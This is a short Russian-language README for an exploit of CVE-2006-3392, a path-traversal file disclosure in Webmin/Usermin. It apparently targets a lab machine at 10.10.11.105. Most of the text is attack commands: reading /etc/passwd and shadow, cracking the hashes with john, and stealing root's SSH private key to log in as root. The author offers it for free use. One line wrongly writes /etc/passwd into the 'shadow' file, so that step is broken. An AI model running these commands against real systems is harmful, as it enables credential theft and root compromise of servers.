
Webmin < 1.290 / Usermin < 1.220 - Произвольное раскрытие файлов
https://www.cvedetails.com/cve/CVE-2006-3392/
Webmin версий до 1.290 и Usermin версий до 1.220 вызывают функцию simplify_path до декодирования HTML, что позволяет удалённым злоумышленникам читать произвольные файлы, как показано на примере использования последовательностей "..%01", которые обходят удаление последовательностей "../" до того, как байты, такие как "%01", удаляются из имени файла. ПРИМЕЧАНИЕ: Это другая проблема, нежели CVE-2006-3274.
Просмотр любого файла в файловой системе с правами root
./exploit.sh <target ip> <target port> <file to disclose>
Просмотр файлов passwd и shadow на 10.10.11.105, объединение (unshadow) и взлом хэшей
./exploit.sh 10.10.11.105 10000 /etc/passwd > passwd
./exploit.sh 10.10.11.105 10000 /etc/passwd > shadow
unshadow passwd shadow > unshadowed
john --wordlist=<your fave wordlist here> unshadowed
Просмотр закрытого ключа RSA на 10.10.11.105
./exploit.sh 10.10.11.105 10000 /root/.ssh/id_rsa > private_key
chmod 600 ./private_key
ssh -i private_key [email protected]
Не стесняйтесь использовать или изменять когда и где угодно